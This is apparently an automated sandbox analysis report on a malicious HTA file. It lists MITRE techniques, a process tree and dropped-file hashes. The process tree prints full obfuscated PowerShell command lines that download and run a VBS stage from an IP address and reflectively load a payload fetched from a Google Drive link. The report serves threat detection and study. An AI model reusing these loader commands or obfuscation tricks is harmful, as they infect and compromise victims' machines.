b8e2fc58afa34cd0e92aa8a763d8cd49e240b47330eb2da9651e04150bd04948

Analysis

max time kernel
105s
max time network
111s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
26-10-2024 02:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b8e2fc58afa34cd0e92aa8a763d8cd49e240b47330eb2da9651e04150bd04948.hta
Size

130KB
MD5

401fa9878282b2404925d1ac2599b7c0
SHA1

876d5ea4b89ef48cd614fc098154e3e2caa176f3
SHA256

b8e2fc58afa34cd0e92aa8a763d8cd49e240b47330eb2da9651e04150bd04948
SHA512

45e2de1e196ae5339df31581bd8e98af094ab461f80269a815f369e51e131a885bb9745c60375aa4c95db75e82d58f799c5ae480ac2aa0b8387baa2aea2d0f63
SSDEEP

96:Eam73bDpMZMY9pMZMUyOX/DJfqMtJNpMZMVx7T:Ea23bDCuY9Cuitht/CuV9T

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

PoWErSHEll.EXEpowershell.exe

flow pid process

3 2052 PoWErSHEll.EXE
6 2336 powershell.exe
8 2336 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2456 powershell.exe
2336 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

PoWErSHEll.EXEpowershell.exe

pid process

2052 PoWErSHEll.EXE
2808 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

5 drive.google.com
6 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
3	2052	PoWErSHEll.EXE
6	2336	powershell.exe
8	2336	powershell.exe

pid	process
2456	powershell.exe
2336	powershell.exe

pid	process
2052	PoWErSHEll.EXE
2808	powershell.exe

flow	ioc
5	drive.google.com
6	drive.google.com

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.exemshta.exePoWErSHEll.EXEpowershell.execsc.execvtres.exeWScript.exepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoWErSHEll.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

PoWErSHEll.EXEpowershell.exepowershell.exepowershell.exe

pid process

2052 PoWErSHEll.EXE
2808 powershell.exe
2052 PoWErSHEll.EXE
2052 PoWErSHEll.EXE
2456 powershell.exe
2336 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2052	PoWErSHEll.EXE
2808	powershell.exe
2052	PoWErSHEll.EXE
2052	PoWErSHEll.EXE
2456	powershell.exe
2336	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

PoWErSHEll.EXEpowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2052	PoWErSHEll.EXE
Token: SeDebugPrivilege	2808	powershell.exe
Token: SeDebugPrivilege	2456	powershell.exe
Token: SeDebugPrivilege	2336	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

mshta.exePoWErSHEll.EXEcsc.exeWScript.exepowershell.exe

description	pid	process	target process
PID 1268 wrote to memory of 2052	1268	mshta.exe	PoWErSHEll.EXE
PID 1268 wrote to memory of 2052	1268	mshta.exe	PoWErSHEll.EXE
PID 1268 wrote to memory of 2052	1268	mshta.exe	PoWErSHEll.EXE
PID 1268 wrote to memory of 2052	1268	mshta.exe	PoWErSHEll.EXE
PID 2052 wrote to memory of 2808	2052	PoWErSHEll.EXE	powershell.exe
PID 2052 wrote to memory of 2808	2052	PoWErSHEll.EXE	powershell.exe
PID 2052 wrote to memory of 2808	2052	PoWErSHEll.EXE	powershell.exe
PID 2052 wrote to memory of 2808	2052	PoWErSHEll.EXE	powershell.exe
PID 2052 wrote to memory of 2868	2052	PoWErSHEll.EXE	csc.exe
PID 2052 wrote to memory of 2868	2052	PoWErSHEll.EXE	csc.exe
PID 2052 wrote to memory of 2868	2052	PoWErSHEll.EXE	csc.exe
PID 2052 wrote to memory of 2868	2052	PoWErSHEll.EXE	csc.exe
PID 2868 wrote to memory of 2856	2868	csc.exe	cvtres.exe
PID 2868 wrote to memory of 2856	2868	csc.exe	cvtres.exe
PID 2868 wrote to memory of 2856	2868	csc.exe	cvtres.exe
PID 2868 wrote to memory of 2856	2868	csc.exe	cvtres.exe
PID 2052 wrote to memory of 564	2052	PoWErSHEll.EXE	WScript.exe
PID 2052 wrote to memory of 564	2052	PoWErSHEll.EXE	WScript.exe
PID 2052 wrote to memory of 564	2052	PoWErSHEll.EXE	WScript.exe
PID 2052 wrote to memory of 564	2052	PoWErSHEll.EXE	WScript.exe
PID 564 wrote to memory of 2456	564	WScript.exe	powershell.exe
PID 564 wrote to memory of 2456	564	WScript.exe	powershell.exe
PID 564 wrote to memory of 2456	564	WScript.exe	powershell.exe
PID 564 wrote to memory of 2456	564	WScript.exe	powershell.exe
PID 2456 wrote to memory of 2336	2456	powershell.exe	powershell.exe
PID 2456 wrote to memory of 2336	2456	powershell.exe	powershell.exe
PID 2456 wrote to memory of 2336	2456	powershell.exe	powershell.exe
PID 2456 wrote to memory of 2336	2456	powershell.exe	powershell.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\b8e2fc58afa34cd0e92aa8a763d8cd49e240b47330eb2da9651e04150bd04948.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1268
- C:\Windows\SysWOW64\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE
  "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2052
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2808
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rq4dsw_v.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2868
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES844E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC844D.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2856
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:564
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2456
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2336

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES844E.tmp

Filesize
1KB

MD5
75e41c8e72a840ec1309fafff688e806

SHA1
09bd604d481c0787bb21d709992e2661fa77c209

SHA256
a95438054bf9fc1750cbab3e2b41b1c45af3a85d30334362cf4e52ed68f75d83

SHA512
8919691099a040900fe5c0d18e1c99e0bd954d7f5d7f8bf7edffac06d49275502b236b1b8bdfb1ea1021ff2739d36a161417f7a99a3d437a968710ad8828f5ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\rq4dsw_v.dll

Filesize
3KB

MD5
5e9058699bc1628799556d81f0580a69

SHA1
701a6c0cfc3cdcee5a78a0e75f128a4e2f468d14

SHA256
a6fd8561ff61453a6851423a6e6b90c267db98fd7d1afb6bd037ec1f01827fc5

SHA512
8322b571ae4eedb6c7543fda6fae9ac205c39ac40b60d3eef846f9b9c8756e35bbca7269368fb1236f44ac9683441f4a3c51414dca760b1589da118788447477

Download Submit
C:\Users\Admin\AppData\Local\Temp\rq4dsw_v.pdb

Filesize
7KB

MD5
82bd584357c188c891e0a1c9cb0bbe5d

SHA1
774fdf85ac4b6c107c9ce278a56668e08ee96124

SHA256
512555548063d2ba992f23393002abca2bb626d1d58cec5dfe92a175e3baceed

SHA512
586479f4ff0c978f5bdd63b8ca5ff1fc40d2c24a1e9e463172d4f51a5d243e231480eb24bc5b60b6bc6a0aa8c08af7a9e05f1cb8a59a9ff454eb25fd0a521c49

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
6bb013f7e81198c190a498c1e1d10c14

SHA1
c68c5f61c179beff018959bb6b4a609727e1251c

SHA256
bdfb4cc49a1e39675054a977f891cc2e623e45a84b0b126f3ed17036cc7a3e55

SHA512
eb9d534c2a41a0e0c9f0e7ddefd55ada91b25ea07e9dae6ee668b86f8a2bfdac5cf702d7eeb58327fb5acb9af5b8b65da301202b59bf4a30ebfc0cd947e83145

Download Submit
C:\Users\Admin\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS

Filesize
137KB

MD5
fe9e18e3366ca7ac8c21eb1ce0631d9c

SHA1
51bc2bc37e87e2d64129cad63df697a68ee3b9d6

SHA256
01c6399fc31b4cbfcf8e851ff3ff433d36b46da2577f9230b9c78b2cbf790912

SHA512
7dca4fb22f5f1a6e08f6c993a7b159863b8b1a8898429aed78582641bc2340ce2fbe3e92f6ec5f9d6ec5c74a14009f77ce87602bea7ba59c4ea1e092d5a9f8f7

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC844D.tmp

Filesize
652B

MD5
a2f6110e50cf63dff9861a3335041f8b

SHA1
0959c6407c33fbdcddf559da607cb49d0de1ab38

SHA256
89d46da0812bc820577fc0354f4cd58bd1dfea5b894f8fd02bad12dc39729611

SHA512
e7347265f7a74d415dbafbb83f90f2910cd6e476dcb19358361928185a4ff7e4b27f63a3009b29334802b9f846cb15fdd4b45078bf6d6981d3e8874960a810e9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rq4dsw_v.0.cs

Filesize
471B

MD5
465b774d7a1a641088ff65cb56d1755b

SHA1
d65ff3c3ecd67b7da02d199d649abb75a8c64879

SHA256
737ceb1cff20744c7d2eb5139717221cf2c96f10d05d5fffd3d916fd69a6d025

SHA512
665f11dfa5a6a79b89c49724ad1943baea2ea54cb204ef3712abb948218064410b42ee96b29f067fc635bc71ec85295603567bf2e9121d381fa2dfbc6c07ea68

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rq4dsw_v.cmdline

Filesize
309B

MD5
bce9dbc1dde307346f8e429d852fce88

SHA1
222e2083374d8718eabd2a35cdf3c0a97ca28138

SHA256
66f2e3554fd1f5be18a880bb325d792880e27948baf0a64036a1aa2b0ce013db

SHA512
ec545b9f0f2f42a55ed6d24471d767b6606b8f26afb3ce23e6516200596c62640cbcb48f494bd109afc73ef299269608ca2ba0eb268a5d8fed8e89800b6671ec

Download Submit